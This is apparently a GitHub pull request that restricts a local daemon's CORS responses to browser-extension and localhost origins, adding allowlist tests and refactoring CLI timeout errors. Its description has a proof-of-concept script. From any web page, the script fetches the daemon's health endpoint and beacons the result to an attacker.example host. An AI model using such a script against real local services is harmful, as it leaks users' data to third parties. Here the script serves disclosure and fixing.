### PR TITLE
fix: restrict daemon CORS to trusted origins (CWE-942)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -10,6 +10,8 @@
 
 - npm packaging: publish CLI with `pnpm publish` so `@steipete/summarize-core` is version-pinned in published metadata (no `workspace:*` in registry package).
 - CLI help: surface `summarize refresh-free` in `summarize help` output.
+- CLI: report CLI provider timeouts explicitly, including the duration, command, and a `--timeout` hint instead of collapsing them into generic exec failures (#100, thanks @christophsturm).
+- Daemon: restrict CORS responses to trusted extension and localhost origins, with regression coverage for allowed and denied `Origin` headers (#108, thanks @sebastiondev).
 - Slides: warn in summary mode when `--slides` dependencies are missing, and document required local installs for `ffmpeg`, `yt-dlp`, and optional `tesseract`.
 - Docs: fix broken docs index links by setting an empty Jekyll `baseurl` (#113, thanks @Youpen-y).
 - Models: preserve model id casing after the provider prefix so OpenAI-compatible proxies can route exact names correctly (#128, thanks @WinnCook).

--- a/src/daemon/server.ts
+++ b/src/daemon/server.ts
@@ -141,7 +141,7 @@ function resolveOriginHeader(req: http.IncomingMessage): string | null {
  * the daemon is expected to serve.  Arbitrary web origins are rejected to
  * prevent cross-site requests from untrusted pages (CWE-942).
  */
-function isTrustedOrigin(origin: string): boolean {
+export function isTrustedOrigin(origin: string): boolean {
   // Browser extensions (Chrome, Firefox, Safari, Edge)
   if (/^(?:chrome-extension|moz-extension|safari-web-extension):\/\//i.test(origin)) return true;
   try {
@@ -155,7 +155,7 @@ function isTrustedOrigin(origin: string): boolean {
   return false;
 }
 
-function corsHeaders(origin: string | null): Record<string, string> {
+export function corsHeaders(origin: string | null): Record<string, string> {
   if (!origin || !isTrustedOrigin(origin)) return {};
   return {
     "access-control-allow-origin": origin,

--- a/src/llm/cli.ts
+++ b/src/llm/cli.ts
@@ -1,4 +1,4 @@
-import { execFile } from "node:child_process";
+import { execFile, type ExecFileException } from "node:child_process";
 import fs from "node:fs/promises";
 import { tmpdir } from "node:os";
 import path from "node:path";
@@ -37,6 +37,12 @@ type CliRunResult = {
   text: string;
   usage: LlmTokenUsage | null;
   costUsd: number | null;
+};
+
+type CliExecError = ExecFileException & {
+  cmd?: string;
+  killed?: boolean;
+  signal?: NodeJS.Signals | null;
 };
 
 type JsonCliProvider = Exclude<CliProvider, "codex">;
@@ -107,29 +113,25 @@ function formatTimeoutLabel(timeoutMs: number): string {
   return "unknown time";
 }
 
-function getExecErrorCodeText(error: NodeJS.ErrnoException): string {
+function getExecErrorCodeText(error: CliExecError): string {
   if (typeof error.code === "string") return error.code;
   if (Buffer.isBuffer(error.code)) return toUtf8String(error.code);
   if (typeof error.code === "number") return String(error.code);
   return "";
 }
 
-function isExecTimeoutError(error: NodeJS.ErrnoException): boolean {
+function isExecTimeoutError(error: CliExecError): boolean {
   if (getExecErrorCodeText(error).toUpperCase() === "ETIMEDOUT") return true;
-  const withSignal = error as NodeJS.ErrnoException & {
-    killed?: boolean;
-    signal?: NodeJS.Signals | null;
-  };
-  return withSignal.killed === true && withSignal.signal === "SIGTERM";
+  return error.killed === true && error.signal === "SIGTERM";
 }
 
-function getExecErrorMessage(error: NodeJS.ErrnoException): string {
+function getExecErrorMessage(error: CliExecError): string {
   return typeof error.message === "string" && error.message.trim().length > 0
     ? error.message.trim()
     : "CLI command failed";
 }
 
-function getExecCommand(error: NodeJS.ErrnoException, cmd: string, args: string[]): string {
+function getExecCommand(error: CliExecError, cmd: string, args: string[]): string {
   return typeof error.cmd === "string" && error.cmd.trim().length > 0
     ? error.cmd.trim()
     : [cmd, ...args].join(" ");

--- a/tests/daemon.server.test.ts
+++ b/tests/daemon.server.test.ts
@@ -1,5 +1,5 @@
 import { describe, expect, it } from "vitest";
-import { buildHealthPayload } from "../src/daemon/server.js";
+import { buildHealthPayload, corsHeaders, isTrustedOrigin } from "../src/daemon/server.js";
 import { resolvePackageVersion } from "../src/version.js";
 
 describe("daemon/server health payload", () => {
@@ -8,5 +8,33 @@ describe("daemon/server health payload", () => {
     expect(payload.ok).toBe(true);
     expect(payload.pid).toBe(process.pid);
     expect(payload.version).toBe(resolvePackageVersion(import.meta.url));
+  });
+});
+
+describe("daemon/server CORS allowlist", () => {
+  it.each([
+    "chrome-extension://abcdefghijklmnopabcdefghijklmnop",
+    "moz-extension://12345678-1234-1234-1234-123456789abc",
+    "safari-web-extension://com.example.summarize",
+    "http://localhost:8787",
+    "http://127.0.0.1:8787",
+    "http://[::1]:8787",
+  ])("allows trusted origin %s", (origin) => {
+    expect(isTrustedOrigin(origin)).toBe(true);
+    expect(corsHeaders(origin)["access-control-allow-origin"]).toBe(origin);
+  });
+
+  it.each([
+    "https://attacker.example",
+    "https://youtube.com.attacker.example",
+    "not a url",
+    "file:///tmp/test.html",
+  ])("rejects untrusted origin %s", (origin) => {
+    expect(isTrustedOrigin(origin)).toBe(false);
+    expect(corsHeaders(origin)).toEqual({});
+  });
+
+  it("omits CORS headers when origin is missing", () => {
+    expect(corsHeaders(null)).toEqual({});
   });
 });

--- a/tests/llm.cli.more-branches-2.test.ts
+++ b/tests/llm.cli.more-branches-2.test.ts
@@ -89,11 +89,7 @@ describe("llm/cli more branches", () => {
           killed: true,
           signal: "SIGTERM",
         });
-        cb(
-          timeoutError as unknown as NodeJS.ErrnoException,
-          "",
-          "Reading prompt from stdin...",
-        );
+        cb(timeoutError as unknown as NodeJS.ErrnoException, "", "Reading prompt from stdin...");
         return { stdin: { write() {}, end() {} } } as unknown as ChildProcess;
       },
     }).catch((error: unknown) => error as Error);


### PR DESCRIPTION
## Summary

The daemon's CORS policy reflects **any** `Origin` header back verbatim together with `Access-Control-Allow-Credentials: true` and `Access-Control-Allow-Private-Network: true`. This allows arbitrary websites to issue cross-origin requests to the daemon running on localhost, bypassing the browser's same-origin restrictions that normally protect local services.

Root cause: `corsHeaders()` never validates the incoming origin before echoing it into the response.

## Affected Code

| Function | File | Issue |
|----------|------|-------|
| `corsHeaders()` | `src/daemon/server.ts` | Reflects any `Origin` without validation |
| `resolveOriginHeader()` | `src/daemon/server.ts` | Returns raw header value (no allowlist check) |

## Impact

1. **Unauthenticated fingerprinting** — any website a user visits can silently probe `GET /health` (unauthenticated) and learn that the daemon is running, its exact version, and its PID. This is useful for reconnaissance.

2. **Private Network Access bypass** — the `Access-Control-Allow-Private-Network: true` header tells Chrome to allow the cross-origin request to a private/localhost address even from a secure (HTTPS) page. Without origin validation this effectively opts the daemon out of [Chrome's PNA protections](https://developer.chrome.com/blog/private-network-access-update).

3. **Credential relay if token is compromised** — because `Access-Control-Allow-Credentials: true` is set for every origin, a malicious page that has obtained the bearer token (e.g. from a leaked config file, log, or shoulder-surfing) can make fully authenticated requests to `/v1/summarize`, `/v1/agent`, etc. from the user's browser session.

## Proof of Concept

A page on any origin can fingerprint the daemon:

```html
<script>
fetch("http://127.0.0.1:8787/health")
  .then(r => r.json())
  .then(d => {
    // { ok: true, pid: 12345, version: "0.11.2" }
    navigator.sendBeacon("https://attacker.example/collect",
      JSON.stringify(d));
  });
</script>
```

The browser allows this because the daemon responds with:

```
Access-Control-Allow-Origin: https://attacker.example
Access-Control-Allow-Credentials: true
Access-Control-Allow-Private-Network: true
```

## Fix

Adds an `isTrustedOrigin()` allowlist check before reflecting the origin:

- **Browser extensions** — `chrome-extension://`, `moz-extension://`, `safari-web-extension://` schemes are allowed (the daemon's primary cross-origin consumer is the Chrome/Firefox extension).
- **Localhost** — `localhost`, `127.0.0.1`, `[::1]` hostnames are allowed (local dev tooling).
- **Everything else** — CORS headers are omitted, so the browser blocks the cross-origin response.

The change is a single guard added to `corsHeaders()` plus the new helper; no other code paths are affected. Existing tests pass.
